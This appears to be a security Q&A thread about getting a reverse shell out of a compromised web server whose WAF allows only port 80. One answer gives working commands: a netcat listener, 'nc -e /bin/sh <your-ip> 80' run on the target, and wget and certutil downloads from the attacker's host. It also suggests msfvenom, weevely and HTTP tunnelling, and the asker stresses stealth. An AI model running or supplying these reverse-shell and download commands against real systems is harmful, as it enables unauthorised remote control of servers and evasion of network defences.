0

Is there any way that i can use the compromised website as the shell

What i am trying to achieve is to get a reverse shell on the machine,not a webshell.The target machine has a website hosted on it open to public.The machine is behind a waf so all tcp are blocked only port 80 is allowed.

Is there any tool out there that can make a php intermediate page between my uploaded reverse tcp shell in the website and my local listener

target machine netcat (NC1) <==>php intermediate webpage<====>attacker netcat (NC2)

how the implementaion should be: NC1 should bind to a localport in target machine ,the php page would read from the socket and upon recieving a get request from N2 would hand it over.

I know it can be programmed but i dont want to take the burden.

ElementX
  • 1
  • 1
  • Can you explain your reasons for not wanting to use a webshell? It would seem like the best choice given the fact that only port 80 is open. – Dan Landberg Jun 02 '20 at 18:25

3 Answers3

0

To get a remote shell on the target system, usually there are two common scenarios:
- reverse shell
- bind shell
Based on your post, I'm assuming that you have a web shell already, and that you have been able to upload reverse shell code to the target. Furthermore I interpret your comments the way that your reverse shell has not been able to connect back to your local listener because of the target's outbound firewall rules. Have you tried various ports?

A bind shell will not work either, because of the inbound firewall rules that you describe.

If inbound port 80 is your only option, weevely might be your tool of choice. Technically, it's a web shell, but at least it provides you with the look and feel of a remote shell.

lab9
  • 474
  • 2
  • 7
0

I don't know of a solution that already exists, not to say there isn't one.

Your description sounds almost like an HTTP tunnel. On Linux, there is HTS. There are other implementations in github (Google it). But these assume you have other ports available and the ability to set them up. In short, it sounds like there is work involved to combine the technologies to do what you are asking.

HOWEVER, if port 80 outbound is allowed (as you say), then can't you do a reverse shell over port 80?

Attacker:  sudo nc -nlvp 80
Target:    nc -e /bin/sh <your-ip> 80

The WAF might be doing deep packet inspection, so try to verify you can receive HTTP communications from the target first.

Attacker:  sudo python3 -m http.server 80
Linux Target:  wget http://<your-ip>
Windows Target:  certutil -urlcache -split -f http://<your-ip>

If the you get any output from the http.server, the target can connect to you. Assuming the target can connect to you, you can try an msfvenom reverse shell, or nc -e or other shells. If these don't work (but the test above does), then more than likely, deep packet inspection is preventing the shell. In that case, use an HTTP tunnel. Install a client on the target to listen on localhost for your remote reverse shell. Setup a server on your attacker to listen for the HTTP tunnel on 80. Forward on to your handler.

Les
  • 123
  • 5
  • I don't want to host a server on my Rig.what I want is to make a ''webshell'' that takes https requests from the attacker pass it to a port on the attacker machine. The attacker is the server as he has a website hosted in it I will simply copy the PHP to the /var/www/.I checked HTS but it needs server on attacker side.In most reallife scenarios this is the case right. and i want to achieve max stealth by this method. – ElementX Jun 03 '20 at 18:15
0

I made the stuff I was talking about thanks, guys!

https://github.com/thesunRider/firedrill

ElementX
  • 1
  • 1